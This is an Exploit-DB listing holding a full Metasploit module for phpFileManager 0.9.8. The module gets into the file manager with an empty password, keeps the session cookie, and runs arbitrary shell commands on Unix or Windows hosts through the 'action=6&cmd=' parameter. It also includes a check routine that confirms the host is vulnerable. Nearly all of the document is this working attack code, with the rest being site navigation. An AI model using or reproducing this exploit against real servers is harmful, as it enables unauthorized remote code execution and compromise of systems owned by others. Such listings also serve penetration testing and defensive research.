phpFileManager 0.9.8 - Remote Code Execution (Metasploit)

EDB-ID:

38900

CVE:


EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

PHP

Date:

2015-12-08

Vulnerable App: 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
      'Description'    => %q{
         This module exploits a remote code execution vulnerability in phpFileManager
         0.9.8 which is a filesystem management tool on a single file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hyp3rlinx', # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          [ 'EDB', '37709' ],
          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 2000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Aug 28 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
      ],self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt}")

    if res && res.body =~ /#{txt}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def push
    uri = normalize_uri(target_uri.path)

    # To push the Enter button
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'frame' => '3',
        'pass'  => '' # yep this should be empty
       }
    })

    if res.nil?
      vprint_error("#{peer} - Connection timed out")
      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
    end

    if res && res.headers && res.code == 302
      print_good("#{peer} - Logged in to the file manager")
      cookie = res.get_cookies
      cookie
    else
      fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
    end
  end

  def http_send_command(cmd)
    cookie = push
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path),
      'cookie'   => cookie,
      'vars_get' => {
        'action' => '6',
        'cmd' => cmd
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "Failed to execute the command.")
    end
    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services